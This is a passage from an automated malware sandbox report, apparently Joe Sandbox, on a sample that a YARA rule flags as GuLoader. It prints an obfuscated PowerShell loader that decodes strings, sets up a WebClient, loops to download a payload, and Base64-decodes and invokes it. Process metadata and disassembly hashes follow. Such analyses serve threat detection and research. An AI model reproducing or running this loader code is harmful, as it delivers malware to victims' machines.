';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
            Imagebase:0x7ff7b2bb0000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:true

            General

            Target ID:9
            Start time:03:59:02
            Start date:30/09/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff620390000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Executed Functions

              Function 00007FF7C0D64479 Relevance: .5, Instructions: 533COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.1471482893.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_7ff7c0d60000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7538f70615bd1065b43e5babf3aaeb70190b0cd2c2ca51c0e874a043a6b59a34
              • Instruction ID: 09a5f12f807970f526d3feca972e3129d33656ca36553774d0f5e037edc62a16
              • Opcode Fuzzy Hash: 7538f70615bd1065b43e5babf3aaeb70190b0cd2c2ca51c0e874a043a6b59a34
              • Instruction Fuzzy Hash: 50F1F825E0DF864FE356AB6858252B4BBD1EF53271B4905FBD049C72D3EE187C0983A2
              Function 00007FF7C0D67F15 Relevance: .4, Instructions: 427COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.1471482893.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_7ff7c0d60000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7efe8543866f62c1e60da98515891816f5dbf83aec324c3d191ce3681e7bb507
              • Instruction ID: c24085cc30f28e57cc675f4923beec04131b9f21b0ae8cae12399364126cb745
              • Opcode Fuzzy Hash: 7efe8543866f62c1e60da98515891816f5dbf83aec324c3d191ce3681e7bb507
              • Instruction Fuzzy Hash: 3ED1473190DF894FE795AF2888556B5BBA1FF16320B4806FED04DC7293DB18B845C3A1
              Function 00007FF7C0D6541D Relevance: .4, Instructions: 369COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.1471482893.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_7ff7c0d60000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 04bc87d11a83be73410eaeeadbfb890354c06273046e2e73794fa6b71837791f
              • Instruction ID: d67a36b96432292d0328d2b4f882b008209de2c522a1b51e9805dc360947689a
              • Opcode Fuzzy Hash: 04bc87d11a83be73410eaeeadbfb890354c06273046e2e73794fa6b71837791f
              • Instruction Fuzzy Hash: 0DB13831A1DE894FE795AF6898546B8BBE1EF56360F8805FBC00DC7293DE18AC45C391
              Function 00007FF7C0D6573E Relevance: .2, Instructions: 172COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.1471482893.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_7ff7c0d60000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7188894f4b478563267a1b0f4f4418a88de033dc88a10e2b0b7563b124b7c79
              • Instruction ID: eb075d62f726e7b61f57c5cfe4dac810ccfdc219d3e8a09a0033c782f26325b1
              • Opcode Fuzzy Hash: f7188894f4b478563267a1b0f4f4418a88de033dc88a10e2b0b7563b124b7c79
              • Instruction Fuzzy Hash: 9E51F42591EBC95FD357AB385C251757FA0EF93224F5905FBC088CB6A3D9082C49C3A2
              Function 00007FF7C0D65542 Relevance: .1, Instructions: 106COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.1471482893.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_7ff7c0d60000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9acd4a0e07435004c99344dce1552696a6d0202b42a5f07d77857af923476461
              • Instruction ID: 8fdd29d5eb9ced49c54dc34464aa07011566b68f75dc04e409ca75b98b86cb1e
              • Opcode Fuzzy Hash: 9acd4a0e07435004c99344dce1552696a6d0202b42a5f07d77857af923476461
              • Instruction Fuzzy Hash: 0A312B25D2EEC60FE395AB6858152B8E6D1AF05370FD806BAC41DC73C6EE087C448791
              Function 00007FF7C0D64604 Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.1471482893.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_7ff7c0d60000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5706a772d0e8217936f387cab1c621e1c498d02d67d5c9a253ab8299234fc240
              • Instruction ID: 8fee211fa93356b946ded3b3100c72a94a36aa2036d682703c3dcc9934f1803f
              • Opcode Fuzzy Hash: 5706a772d0e8217936f387cab1c621e1c498d02d67d5c9a253ab8299234fc240
              • Instruction Fuzzy Hash: 7F210C31E0DE464FE395AB6898552F4A6C2EF46771BD805B9D40DC7393EE18FC054391
              Function 00007FF7C0D619AF Relevance: .1, Instructions: 78COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.1471482893.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_7ff7c0d60000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 728ca7478b9ab66926287c4474b29bdb4384b8c48dbfd5b617fc138ddb53cb9f
              • Instruction ID: 5b2ee377ad3de9a15c46c96bda82083c829bada5f8b9c6638834a0ef2dc346d0
              • Opcode Fuzzy Hash: 728ca7478b9ab66926287c4474b29bdb4384b8c48dbfd5b617fc138ddb53cb9f
              • Instruction Fuzzy Hash: 25213766E0EEC54FE355A73868251B4BBD1EF46B60B5805FFC058C7293ED186C0A87A2
              Function 00007FF7C0C941E5 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.1470737003.00007FF7C0C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0C90000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_7ff7c0c90000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
              • Instruction ID: 96237c296d42316faf99294a11d7523164d319ca6f0d84a8a18609758250d4c1
              • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
              • Instruction Fuzzy Hash: 9501A73010CB0C4FD744EF0CE451AA5B3E0FB95360F10056DE58AC3665D736E882CB41